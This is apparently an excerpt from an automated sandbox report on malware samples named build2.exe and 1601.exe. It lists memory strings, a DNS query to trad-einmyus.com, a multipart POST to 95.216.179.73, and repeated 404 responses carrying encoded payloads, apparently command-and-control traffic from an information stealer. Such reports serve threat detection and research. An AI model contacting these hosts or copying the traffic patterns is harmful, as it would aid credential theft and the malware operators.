Source: build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 1601.exe, 00000010.00000003.1828182128.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 1601.exe, 00000010.00000003.1828581062.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: 1601.exe, 00000010.00000003.1828726463.00000000098D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: trad-einmyus.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0Host: 95.216.179.73Content-Length: 279Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Thu, 04 Apr 2024 15:49:15 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 19 Jun 2022 19:44:22 GMTAccept-Ranges: bytesContent-Length: 744Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 04 Apr 2024 15:49:19 GMTContent-Type: text/html; charset=utf-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: require-trusted-types-for 'script';report-uri https://csp.withgoogle.com/csp/docs-ttReferrer-Policy: originX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=512=WUI-UerPWezsfoz3j1VI-ImGAl-k6n7rrVx_ERgBMHWGYIb5tt8HnUgZ61qbFvKOWeN6q9Cea-8i1e4ypmYmRcl1mpb9ksFif3ujk97iSKO4jcBBRjr4KBrYE-vyVv3EqIMULeeaAbK9q0Mp2JfbpyfSGt9wLRSRLf4BkuwKaFM; expires=Fri, 04-Oct-2024 15:49:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Apr 2024 15:49:23 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=cFWHzNk64gUphjGg4iYi4.gAm2uWvnA7HQGC6cLHdb4-1712245763-1.0.1.1-IGJTnCh8pFb9qSfKccN5CZsuE6tUeQ3fT7ynf8z7mh4uvNE6JHGAXCNN_X_G8XVTah_jmpAUrT.6Jj_5XsWWRw; path=/; expires=Thu, 04-Apr-24 16:19:23 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lmV%2BpwKPLTnkjJdIuSB5Z8%2BO9cVrIkQsUIsggxlWgErJk3QopXmHnH6Zq9hmkdmk%2FdY8TbISjnf%2FK%2BbalE0jlg7y530JlkPn%2BXjdzzM3Wa0FQd03WUq83zFHiaCtzugdJNZ%2FqA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=dvhoS4JwQS9b42_0zZuZR9oWplN_Dl9JzVq1szj6zbQ-1712245763561-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 86f272b639360971-MIAalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 10 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d2 83 40 0d 63 07 ea e8 8f bd a7 5e a0 10 91 60 a2 5f 53 90 1f bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82O@c^`_S10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:48:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cc d5 54 02 6c 5c e5 aa 81 fc ab 12 ea 15 da 2d b8 45 52 9d 0b fe ee 3a ae 2f 4d 1b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2fI:82OTl\-ER:/M0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Thu, 04 Apr 2024 15:49:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73\|"s2h3T'cSc"8iz`;?Dt0
